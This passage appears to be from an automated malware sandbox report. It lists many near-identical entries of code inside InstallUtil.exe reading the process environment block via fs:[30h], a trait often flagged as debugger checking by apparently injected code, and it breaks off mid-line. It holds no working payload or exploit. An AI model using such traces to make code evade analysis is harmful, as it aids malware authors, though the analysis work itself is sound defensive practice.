Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012475F0 mov eax, dword ptr fs:[00000030h]2_2_012475F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012475F0 mov eax, dword ptr fs:[00000030h]2_2_012475F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01242DF0 mov eax, dword ptr fs:[00000030h]2_2_01242DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012195C0 mov eax, dword ptr fs:[00000030h]2_2_012195C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012195C0 mov ecx, dword ptr fs:[00000030h]2_2_012195C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01294DCA mov eax, dword ptr fs:[00000030h]2_2_01294DCA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01294DCA mov eax, dword ptr fs:[00000030h]2_2_01294DCA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0122A423 mov eax, dword ptr fs:[00000030h]2_2_0122A423
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0122A423 mov eax, dword ptr fs:[00000030h]2_2_0122A423
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0122A423 mov eax, dword ptr fs:[00000030h]2_2_0122A423
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012D0C29 mov eax, dword ptr fs:[00000030h]2_2_012D0C29
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0123F42B mov eax, dword ptr fs:[00000030h]2_2_0123F42B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0123F42B mov eax, dword ptr fs:[00000030h]2_2_0123F42B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0123F42B mov eax, dword ptr fs:[00000030h]2_2_0123F42B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0123F42B mov eax, dword ptr fs:[00000030h]2_2_0123F42B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0123F42B mov eax, dword ptr fs:[00000030h]2_2_0123F42B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0123F42B mov eax, dword ptr fs:[00000030h]2_2_0123F42B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012A3C38 mov eax, dword ptr fs:[00000030h]2_2_012A3C38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01240430 mov eax, dword ptr fs:[00000030h]2_2_01240430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01211C09 mov eax, dword ptr fs:[00000030h]2_2_01211C09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01231410 mov ecx, dword ptr fs:[00000030h]2_2_01231410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012DA416 mov eax, dword ptr fs:[00000030h]2_2_012DA416
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012DA416 mov eax, dword ptr fs:[00000030h]2_2_012DA416
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0124341B mov eax, dword ptr fs:[00000030h]2_2_0124341B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0124341B mov eax, dword ptr fs:[00000030h]2_2_0124341B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0124341B mov eax, dword ptr fs:[00000030h]2_2_0124341B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012CAC60 mov eax, dword ptr fs:[00000030h]2_2_012CAC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012CAC60 mov eax, dword ptr fs:[00000030h]2_2_012CAC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0124547E mov eax, dword ptr fs:[00000030h]2_2_0124547E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0124547E mov eax, dword ptr fs:[00000030h]2_2_0124547E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0124547E mov eax, dword ptr fs:[00000030h]2_2_0124547E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0124547E mov eax, dword ptr fs:[00000030h]2_2_0124547E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0124547E mov eax, dword ptr fs:[00000030h]2_2_0124547E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0124547E mov eax, dword ptr fs:[00000030h]2_2_0124547E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0124547E mov eax, dword ptr fs:[00000030h]2_2_0124547E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0124547E mov eax, dword ptr fs:[00000030h]2_2_0124547E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0124547E mov eax, dword ptr fs:[00000030h]2_2_0124547E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0124547E mov eax, dword ptr fs:[00000030h]2_2_0124547E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0124547E mov eax, dword ptr fs:[00000030h]2_2_0124547E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0124547E mov eax, dword ptr fs:[00000030h]2_2_0124547E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01237C7D mov eax, dword ptr fs:[00000030h]2_2_01237C7D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012A3C47 mov eax, dword ptr fs:[00000030h]2_2_012A3C47
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012D145F mov eax, dword ptr fs:[00000030h]2_2_012D145F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012DE455 mov eax, dword ptr fs:[00000030h]2_2_012DE455
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0124245F mov eax, dword ptr fs:[00000030h]2_2_0124245F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0124245F mov eax, dword ptr fs:[00000030h]2_2_0124245F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0124245F mov eax, dword ptr fs:[00000030h]2_2_0124245F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0124245F mov eax, dword ptr fs:[00000030h]2_2_0124245F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0124245F mov eax, dword ptr fs:[00000030h]2_2_0124245F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0124245F mov eax, dword ptr fs:[00000030h]2_2_0124245F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0124245F mov eax, dword ptr fs:[00000030h]2_2_0124245F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0124245F mov eax, dword ptr fs:[00000030h]2_2_0124245F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0124245F mov eax, dword ptr fs:[00000030h]2_2_0124245F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012E8452 mov eax, dword ptr fs:[00000030h]2_2_012E8452
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012114A0 mov eax, dword ptr fs:[00000030h]2_2_012114A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01227488 mov eax, dword ptr fs:[00000030h]2_2_01227488
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012D0C9A mov eax, dword ptr fs:[00000030h]2_2_012D0C9A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012D3490 mov eax, dword ptr fs:[00000030h]2_2_012D3490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012D3490 mov eax, dword ptr fs:[00000030h]2_2_012D3490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012D3490 mov eax, dword ptr fs:[00000030h]2_2_012D3490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012D3490 mov eax, dword ptr fs:[00000030h]2_2_012D3490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012D3490 mov eax, dword ptr fs:[00000030h]2_2_012D3490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012D3490 mov eax, dword ptr fs:[00000030h]2_2_012D3490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012D3490 mov eax, dword ptr fs:[00000030h]2_2_012D3490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012D3490 mov eax, dword ptr fs:[00000030h]2_2_012D3490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012D3490 mov eax, dword ptr fs:[00000030h]2_2_012D3490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012D3490 mov eax, dword ptr fs:[00000030h]2_2_012D3490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012D3490 mov eax, dword ptr fs:[00000030h]2_2_012D3490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012D3490 mov eax, dword ptr fs:[00000030h]2_2_012D3490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012D44EF mov eax, dword ptr fs:[00000030h]2_2_012D44EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012D44EF mov eax, dword ptr fs:[00000030h]2_2_012D44EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012D44EF mov eax, dword ptr fs:[00000030h]2_2_012D44EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012D44EF mov eax, dword ptr fs:[00000030h]2_2_012D44EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012D44EF mov eax, dword ptr fs:[00000030h]2_2_012D44EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012D44EF mov eax, dword ptr fs:[00000030h]2_2_012D44EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012D44EF mov eax, dword ptr fs:[00000030h]2_2_012D44EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012D44EF mov eax, dword ptr fs:[00000030h]2_2_012D44EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012D44EF mov eax, dword ptr fs:[00000030h]2_2_012D44EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012D44EF mov eax, dword ptr fs:[00000030h]2_2_012D44EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012D44EF mov eax, dword ptr fs:[00000030h]2_2_012D44EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012D44EF mov eax, dword ptr fs:[00000030h]2_2_012D44EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012D44EF mov eax, dword ptr fs:[00000030h]2_2_012D44EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012D44EF mov eax, dword ptr fs:[00000030h]2_2_012D44EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01212CFB mov eax, dword ptr fs:[00000030h]2_2_01212CFB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0121ACC0 mov eax, dword ptr fs:[00000030h]2_2_0121ACC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012E84CD mov eax, dword ptr fs:[00000030h]2_2_012E84CD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0123E4C6 mov eax, dword ptr fs:[00000030h]2_2_0123E4C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0123E4C6 mov eax, dword ptr fs:[00000030h]2_2_0123E4C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012DDF39 mov eax, dword ptr fs:[00000030h]2_2_012DDF39
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012E870A mov eax, dword ptr fs:[0000